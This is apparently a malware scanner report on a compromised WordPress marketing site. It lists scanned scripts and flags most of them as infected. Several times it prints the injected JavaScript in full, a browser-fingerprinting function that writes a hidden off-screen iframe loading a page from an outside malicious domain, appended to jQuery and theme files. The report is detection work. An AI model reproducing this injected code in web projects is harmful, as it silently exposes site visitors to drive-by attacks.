Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=creativemedspamarketing.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.creativemedspamarketing.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 03 Mar 2015 02:49:20 GMT Location: http://creativemedspamarketing.com/ Server: Apache Vary: Cookie Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://creativemedspamarketing.com/xmlrpc.php | clean |
http://creativemedspamarketing.com/ | 200 OK Content-Length: 14915 Content-Type: text/html | clean |
http://creativemedspamarketing.com/wp-includes/js/comment-reply.min.js?ver=3.8.5 | 200 OK Content-Length: 1988 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: quqylife.neatesl.com ...[255 bytes skipped]... />function Pleos_Aflertuder() { var r_amblartide = navigator.userAgent; var Yellowgrand = (r_amblartide.indexOf("IEMobile") > -1 || r_amblartide.indexOf("Windows NT 6.3") > -1 || r_amblartide.indexOf("Chrome") > -1 || r_amblartide.indexOf("Windows") < +1); var Ultrastilus = (getCookie("Garamg18usality") === undefined); if (!Yellowgrand && Ultrastilus) { document.write('<iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe>'); var date = new Date( new Date().getTime() + 66*60*60*1000 ); document.cookie="Garamg18usality=1; path=/; expires="+date.toUTCString(); } } Pleos_Aflertuder(); var addCom ...[795 bytes skipped]... Decoded script: <iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe> Malicious iFrame found. size: 100x100 src: http://quqylife.neatesl.com/aploirdouie16.html This URL is marked by Google as suspicious <iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400d12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"> | ||
http://creativemedspamarketing.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 94316 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: quqylife.neatesl.com ...[255 bytes skipped]... />function Pleos_Aflertuder() { var r_amblartide = navigator.userAgent; var Yellowgrand = (r_amblartide.indexOf("IEMobile") > -1 || r_amblartide.indexOf("Windows NT 6.3") > -1 || r_amblartide.indexOf("Chrome") > -1 || r_amblartide.indexOf("Windows") < +1); var Ultrastilus = (getCookie("Garamg18usality") === undefined); if (!Yellowgrand && Ultrastilus) { document.write('<iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe>'); var date = new Date( new Date().getTime() + 66*60*60*1000 ); document.cookie="Garamg18usality=1; path=/; expires="+date.toUTCString(); } } Pleos_Aflertuder(); (function( ...[3014 bytes skipped]... Decoded script: <iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe> Malicious iFrame found. size: 100x100 src: http://quqylife.neatesl.com/aploirdouie16.html This URL is marked by Google as suspicious <iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400d12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"> | ||
http://creativemedspamarketing.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8431 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: quqylife.neatesl.com ...[255 bytes skipped]... />function Pleos_Aflertuder() { var r_amblartide = navigator.userAgent; var Yellowgrand = (r_amblartide.indexOf("IEMobile") > -1 || r_amblartide.indexOf("Windows NT 6.3") > -1 || r_amblartide.indexOf("Chrome") > -1 || r_amblartide.indexOf("Windows") < +1); var Ultrastilus = (getCookie("Garamg18usality") === undefined); if (!Yellowgrand && Ultrastilus) { document.write('<iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe>'); var date = new Date( new Date().getTime() + 66*60*60*1000 ); document.cookie="Garamg18usality=1; path=/; expires="+date.toUTCString(); } } Pleos_Aflertuder(); jQue ...[3099 bytes skipped]... Decoded script: <iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe> Malicious iFrame found. size: 100x100 src: http://quqylife.neatesl.com/aploirdouie16.html This URL is marked by Google as suspicious <iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400d12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"> | ||
http://creativemedspamarketing.com/wp-content/uploads/shareaholic/spritegen/jquery.shareaholic-publishers-sb.min.js?ver=6.0.0.3 | 200 OK Content-Length: 50796 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: quqylife.neatesl.com ...[255 bytes skipped]... />function Pleos_Aflertuder() { var r_amblartide = navigator.userAgent; var Yellowgrand = (r_amblartide.indexOf("IEMobile") > -1 || r_amblartide.indexOf("Windows NT 6.3") > -1 || r_amblartide.indexOf("Chrome") > -1 || r_amblartide.indexOf("Windows") < +1); var Ultrastilus = (getCookie("Garamg18usality") === undefined); if (!Yellowgrand && Ultrastilus) { document.write('<iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe>'); var date = new Date( new Date().getTime() + 66*60*60*1000 ); document.cookie="Garamg18usality=1; path=/; expires="+date.toUTCString(); } } Pleos_Aflertuder(); "undefined ...[2965 bytes skipped]... Decoded script: <iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe> Malicious iFrame found. size: 100x100 src: http://quqylife.neatesl.com/aploirdouie16.html This URL is marked by Google as suspicious <iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400d12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"> | ||
http://creativemedspamarketing.com/wp-content/themes/canvas/includes/js/third-party.js?ver=3.8.5 | 200 OK Content-Length: 5623 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: quqylife.neatesl.com ...[255 bytes skipped]... />function Pleos_Aflertuder() { var r_amblartide = navigator.userAgent; var Yellowgrand = (r_amblartide.indexOf("IEMobile") > -1 || r_amblartide.indexOf("Windows NT 6.3") > -1 || r_amblartide.indexOf("Chrome") > -1 || r_amblartide.indexOf("Windows") < +1); var Ultrastilus = (getCookie("Garamg18usality") === undefined); if (!Yellowgrand && Ultrastilus) { document.write('<iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe>'); var date = new Date( new Date().getTime() + 66*60*60*1000 ); document.cookie="Garamg18usality=1; path=/; expires="+date.toUTCString(); } } Pleos_Aflertuder(); Decoded script: <iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe> Malicious iFrame found. size: 100x100 src: http://quqylife.neatesl.com/aploirdouie16.html This URL is marked by Google as suspicious <iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400d12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"> | ||
http://creativemedspamarketing.com/wp-content/themes/canvas/includes/js/jquery.flexslider.min.js?ver=3.8.5 | 200 OK Content-Length: 17608 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: quqylife.neatesl.com ...[255 bytes skipped]... />function Pleos_Aflertuder() { var r_amblartide = navigator.userAgent; var Yellowgrand = (r_amblartide.indexOf("IEMobile") > -1 || r_amblartide.indexOf("Windows NT 6.3") > -1 || r_amblartide.indexOf("Chrome") > -1 || r_amblartide.indexOf("Windows") < +1); var Ultrastilus = (getCookie("Garamg18usality") === undefined); if (!Yellowgrand && Ultrastilus) { document.write('<iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe>'); var date = new Date( new Date().getTime() + 66*60*60*1000 ); document.cookie="Garamg18usality=1; path=/; expires="+date.toUTCString(); } } Pleos_Aflertuder(); ; (functi ...[3027 bytes skipped]... Decoded script: <iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe> Malicious iFrame found. size: 100x100 src: http://quqylife.neatesl.com/aploirdouie16.html This URL is marked by Google as suspicious <iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400d12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"> | ||
http://creativemedspamarketing.com/wp-content/themes/canvas/includes/js/general.js?ver=3.8.5 | 200 OK Content-Length: 3531 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: quqylife.neatesl.com ...[255 bytes skipped]... />function Pleos_Aflertuder() { var r_amblartide = navigator.userAgent; var Yellowgrand = (r_amblartide.indexOf("IEMobile") > -1 || r_amblartide.indexOf("Windows NT 6.3") > -1 || r_amblartide.indexOf("Chrome") > -1 || r_amblartide.indexOf("Windows") < +1); var Ultrastilus = (getCookie("Garamg18usality") === undefined); if (!Yellowgrand && Ultrastilus) { document.write('<iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe>'); var date = new Date( new Date().getTime() + 66*60*60*1000 ); document.cookie="Garamg18usality=1; path=/; expires="+date.toUTCString(); } } Pleos_Aflertuder(); Decoded script: <iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe> Malicious iFrame found. size: 100x100 src: http://quqylife.neatesl.com/aploirdouie16.html This URL is marked by Google as suspicious <iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400d12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"> | ||
http://creativemedspamarketing.com/wp-content/plugins/embed-facebook/slidewindow/slidewindow_min.js | 200 OK Content-Length: 8728 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: quqylife.neatesl.com ...[255 bytes skipped]... />function Pleos_Aflertuder() { var r_amblartide = navigator.userAgent; var Yellowgrand = (r_amblartide.indexOf("IEMobile") > -1 || r_amblartide.indexOf("Windows NT 6.3") > -1 || r_amblartide.indexOf("Chrome") > -1 || r_amblartide.indexOf("Windows") < +1); var Ultrastilus = (getCookie("Garamg18usality") === undefined); if (!Yellowgrand && Ultrastilus) { document.write('<iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe>'); var date = new Date( new Date().getTime() + 66*60*60*1000 ); document.cookie="Garamg18usality=1; path=/; expires="+date.toUTCString(); } } Pleos_Aflertuder(); curr ...[3340 bytes skipped]... Decoded script: ...[4168 bytes skipped]... t;/td><td id=\"br\"></td></tr></table>"; document.body.appendChild(modalWnd); setWndSize(400, 300); setWndPos(false); imgArea = document.getElementById("imgArea"); imgLoad = document.createElement("img"); imgLoad.src = currPath + "loading.gif"; imgArea.appendChild(imgLoad); imgMain = document.createElement("img"); } <iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe> Malicious iFrame found. size: 100x100 src: http://quqylife.neatesl.com/aploirdouie16.html This URL is marked by Google as suspicious <iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400d12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"> | ||
http://www.catchfirecoaching.com/easyvideo/framework.php?div_id=evp-a433834cf6ce7fb98d10194daa5934f4&id=ZG91YmxlLXlvdXItaW5jb21lLTEtMS5tcDQ%3D&v=1339264006&profile=default | 200 OK Content-Length: 869 Content-Type: text/html | clean |
http://www.catchfirecoaching.com/test404page.js | 200 OK Content-Length: 745 Content-Type: text/html | clean |
https://catchfirecoachin.infusionsoft.com/app/form/iframe/163eb5736296df0ba1ccb4e9f03d3213 | 200 OK Content-Length: 3844 Content-Type: text/plain | clean |
http://creativemedspamarketing.com/wp-content/themes/canvas/includes/js/feedback.js?ver=5.0.7 | 200 OK Content-Length: 2809 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: quqylife.neatesl.com ...[255 bytes skipped]... />function Pleos_Aflertuder() { var r_amblartide = navigator.userAgent; var Yellowgrand = (r_amblartide.indexOf("IEMobile") > -1 || r_amblartide.indexOf("Windows NT 6.3") > -1 || r_amblartide.indexOf("Chrome") > -1 || r_amblartide.indexOf("Windows") < +1); var Ultrastilus = (getCookie("Garamg18usality") === undefined); if (!Yellowgrand && Ultrastilus) { document.write('<iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe>'); var date = new Date( new Date().getTime() + 66*60*60*1000 ); document.cookie="Garamg18usality=1; path=/; expires="+date.toUTCString(); } } Pleos_Aflertuder(); jQuery( do ...[1521 bytes skipped]... Decoded script: <iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe> Malicious iFrame found. size: 100x100 src: http://quqylife.neatesl.com/aploirdouie16.html This URL is marked by Google as suspicious <iframe src="http://quqylife.neatesl.com/aploirdouie16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400d12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"> | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: creativemedspamarketing.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3, must-revalidate
Connection: close
Date: Tue, 03 Mar 2015 02:49:23 GMT
Server: Apache
Vary: Accept-Encoding,Cookie
Content-Type: text/html; charset=UTF-8
WP-Super-Cache: Served supercache file from PHP
GET / HTTP/1.1
Host: creativemedspamarketing.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3, must-revalidate
Connection: close
Date: Tue, 03 Mar 2015 02:49:23 GMT
Server: Apache
Vary: Accept-Encoding,Cookie
Content-Type: text/html; charset=UTF-8
WP-Super-Cache: Served supercache file from PHP
Second query (visit from search engine):
GET / HTTP/1.1
Host: creativemedspamarketing.com
Referer: http://www.google.com/search?q=creativemedspamarketing.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: creativemedspamarketing.com
Referer: http://www.google.com/search?q=creativemedspamarketing.com
Result:
The result is similar to the first query. There are no suspicious redirects found.